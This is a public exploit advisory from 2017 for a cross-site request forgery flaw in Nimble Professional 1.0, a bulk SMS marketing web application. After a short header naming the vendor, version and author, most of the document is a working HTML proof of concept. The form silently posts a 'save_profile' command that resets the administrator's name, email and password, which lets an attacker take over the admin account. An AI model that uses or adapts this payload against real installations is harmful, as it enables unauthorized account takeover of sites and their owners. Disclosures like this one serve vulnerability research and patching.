Nimble Professional 1.0 Cross Site Request Forgery
Posted on 12 September 2017
<!-- # # # # # # Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin) # Dork: N/A # Date: 11.09.2017 # Vendor Homepage: http://ranksol.com/ # Software Link: http://www.mojomarketplace.com/item/nimble-pro # Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # # Proof of Concept: --> <html> <body> <label>Edit Profile:</label> <form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php"> <label>Admin Name:</label> <input type="text" name="name" style="width: 400px;" value="Admin"> <label>Admin Email:</label> <input type="text" name="email" style="width: 400px;" value="a@a.com"> <label>Admin Password:</label> <input type="text" name="pass" style="width: 400px;" value="efe"> <button type="submit" class="btn btn-success" >Save Profile</button> <input type="hidden" name="cmd" value="save_profile"> </form> </body> </html>
